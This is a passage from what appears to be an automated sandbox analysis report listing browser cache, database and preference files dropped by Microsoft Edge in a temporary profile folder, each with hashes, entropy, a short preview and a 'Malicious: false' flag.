Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.019797536844534
Encrypted:	false
SSDEEP:	3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
MD5:	90881C9C26F29FCA29815A08BA858544
SHA1:	06FEE974987B91D82C2839A4BB12991FA99E1BDD
SHA-256:	A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
SHA-512:	15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
Malicious:	false
Preview:	...n'................_mts_schema_descriptor...

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	269
Entropy (8bit):	5.181289715617799
Encrypted:	false
SSDEEP:	6:iOHDs1wkn23fpEEx2KLldAS5L+q2Pwkn23fpEiIFUv:7jLfRVLcS5L+vYfWFUv
MD5:	2086E8B29BE5F15ED80C6CAFAE3C641A
SHA1:	4BDB962F538DB4AAED1D6A6E814E58D513E91927
SHA-256:	BC9C181B29A584E9F134AD970C194D27C8F1705C9516345D9CF1B4F8571BFF98
SHA-512:	994B2F6BF4B43E49A95426A0DEC439AC4938D742D9FE78FEDE876E5F54B066D80B66E5CEDEE83DF7298C22DCF040D468DFA4D2445F9C165CC18700B5913ABD57
Malicious:	false
Preview:	2025/01/05-02:32:33.365 117c Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB since it was missing..2025/01/05-02:32:33.397 117c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Top Sites

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.3528485475628876
Encrypted:	false
SSDEEP:	12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
MD5:	F2B4FB2D384AA4E4D6F4AEB0BBA217DC
SHA1:	2CD70CFB3CE72D9B079170C360C1F563B6BF150E
SHA-256:	1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
SHA-512:	48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Visited Links

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.002095330713584969
Encrypted:	false
SSDEEP:	3:ImtVxypl/:IiVI/
MD5:	CAD91540C5AF61575C6FFDD77FC55D8E
SHA1:	E2FA59D450ED95FA3D1BDBEC406D4EC90C252C4A
SHA-256:	F017F004145D1C0A8D6D3E1230C9FC573B1EF595E2B0CB24BFF52CA7F1B0B019
SHA-512:	ADD32C32738A3DB41D200A30E4A48F586FC67B6AB45C2C2AE98E312D8189496C075255F8AD23F5015C3305DD8AC0916E1FBA92BAA09EFED443709F342CE15DED
Malicious:	false
Preview:	VLnk.....?.......?.z...W................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 4, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	182272
Entropy (8bit):	1.0774430162873518
Encrypted:	false
SSDEEP:	192:erb2qAdB9TbTbuDDsnxCkOYSAE+WslKOMq+vVumYARn66:e/2qOB1nxCkOYSAELyKOMq+vVum9p
MD5:	BA1DED8DD710D9234AD94018AA1285D0
SHA1:	4CBA96D874CF3B9A44360BDFEFAE37E8A054A533
SHA-256:	3AE85512FD39ADD312BC2F98B9BFE9181C76EA19F7E45F96A66C3321046EC28B
SHA-512:	9B45B39FFBD64B3CF213F422B9667DC3FA2070981A43CA5BAD1C71780C8FB54E41A5450936F48F978230CBEDAEB7D960AC2647E345E58B11740131D784997AD9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\WebAssistDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	0.7836182415564406
Encrypted:	false
SSDEEP:	24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
MD5:	AA9965434F66985F0979719F3035C6E1
SHA1:	39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
SHA-256:	F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
SHA-512:	201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\a89fde65-022a-4e39-b8d0-6e89ec1d7642.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	modified
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\bbd2863e-9366-4ec5-a9e9-410b09243bd7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\c981147e-aefd-4433-b4d7-9e5a26c0493f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6973
Entropy (8bit):	4.938903222925794
Encrypted:	false
SSDEEP:	96:stLSwTEYd+s13ob91VZJ8z9r30Sd85eh66b7/x+6MhmuecmAebvAx2MTQyVrSJ:stLSwT+syZJk9r30k8EbV+FiAGePlWJ
MD5:	3D4EA67E9169D1A6E9BE595C4433FFA0
SHA1:	1B0469395B39C9113F876690D582188BFB233037
SHA-256:	4BE1D92418FEDE24140A2E6AF76EBAEECD83A87173CAF626318E0447591BAA0F
SHA-512:	930EE3F8A3F3D625CB02465918B68AFE532B6E8D0AC62CF14BFBAA92414954120C3072D3990C1DC05DE878BAB4E9C5E76278FD5CDEB85CF115E1F00AC3BD8A33
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380535955527806","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13380535954857809","domain_diversity":{"last_reporting_timestamp":"13380535955537256"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_sit

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\dc261ba9-f473-462b-86ea-41772b8ecca2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.571268511913353
Encrypted:	false
SSDEEP:	768:qAhE4SWP5Ff+t8F1+UoAYDCx9Tuqh0VfUC9xbog/OVwlp42rwTp36tu7:qAhE4SWP5Ff+tu1ja/X4T0tE
MD5:	CC10BB40645049496BE8556FD5E51FFF
SHA1:	1B0CCE37515808448CF1406EB59B789D2EB76ACD
SHA-256:	C743E47DC91B793FDF84498FEDB4C70AC90C40C14A47A2F6987B8618BAB7C6F2
SHA-512:	502B9EA4BE7914F3575B328F152FA30843A26FA97DE7F93C74A45B23660BC0878C819753637DFA53F32F7C72822AA8D248732174D949533E18C832D5F2063DF8
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380535953365246","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380535953365246","location":5,"ma

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\f653def7-c471-44e2-af47-42e0ff58ddac.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\heavy_ad_intervention_opt_out.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.35226517389931394
Encrypted:	false
SSDEEP:	12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
MD5:	D2CCDC36225684AAE8FA563AFEDB14E7
SHA1:	3759649035F23004A4C30A14C5F0B54191BEBF80
SHA-256:	080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
SHA-512:	1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	265
Entropy (8bit):	5.246622362816034
Encrypted:	false
SSDEEP:	6:iOHTGms1wkn23fpEUrl2KLldE5L+q2Pwkn23fpEUrK+IFUv:7qmLfFLcL+vYfG3FUv
MD5:	E4D3E1746EE49620B5918E8C6926CA8A
SHA1:	9B4F6045ECE5A4ECCC6D05E17C5FA54E398DB64C
SHA-256:	7F04373A6000CFE5DC5781EEBBD78D8649A18ACA1C3039C7B4EBFD0B138FF741
SHA-512:	9F3125A6811F0302E733333BF78EB9541E780BB2BB95F734AA04FD8F867DF562366E7B6B0289E61693842DC35A68FAABEC5B33C8116510526129C011EDB8E06F
Malicious:	false
Preview:	2025/01/05-02:32:35.596 117c Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db since it was missing..2025/01/05-02:32:35.635 117c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	184
Entropy (8bit):	3.7064843374216494
Encrypted:	false
SSDEEP:	3:G0XttkJcsRwI9tkJcsIap3mEaXe/tlfmo1cgtfmEbQJkZt/fmoG:G0XtqcsqcpS3m9XOPmQ1mdkZt3mh
MD5:	B35D474DF6A64D3841ECDF798DBE93FF
SHA1:	DD4C3D2FDC5997B6DF5FB619420125F8D12D5449
SHA-256:	924C5DED0B3D90B90AE8D7EC72CF1FCBEDF69402A2DF3302E462495D47D6BD1D
SHA-512:	C4CFAEFB6DC71762ABEB055240B9D64F7EC573BA0FD165277DEF2658B8D605B78EEEE37092840731AA687CEFEF55341595A08CBD3871E32D02182F8EFE82159F
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... ..'i..................21_.....B....................33_......-.t.................21_......'..................33_.....

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	281
Entropy (8bit):	5.158938165753824
Encrypted:	false
SSDEEP:	6:iOHhFHF1wkn23fpEUrzs52KLldJ9Ai+q2Pwkn23fpEUrzAdIFUv:7r4f89Lwi+vYftFUv
MD5:	D545DEBD83971E35F6FB113345B07EB1
SHA1:	F52701E8EA67E2DB600734225C630694A818E54C
SHA-256:	C8F131531F5C1A4F5BEB8B4EBBAF34139672C8520A48F9894D5F9CD0E997B11D
SHA-512:	7FC43112EBDE1AAF26BB147052A48BDAD10803DA065A00FE36AD169CB2B382520B99257B903EA9149C7316F66F94C51F9CC94F032E741A96A4A45F04B18A7242
Malicious:	false
Preview:	2025/01/05-02:32:35.573 bec Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata since it was missing..2025/01/05-02:32:35.591 bec Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
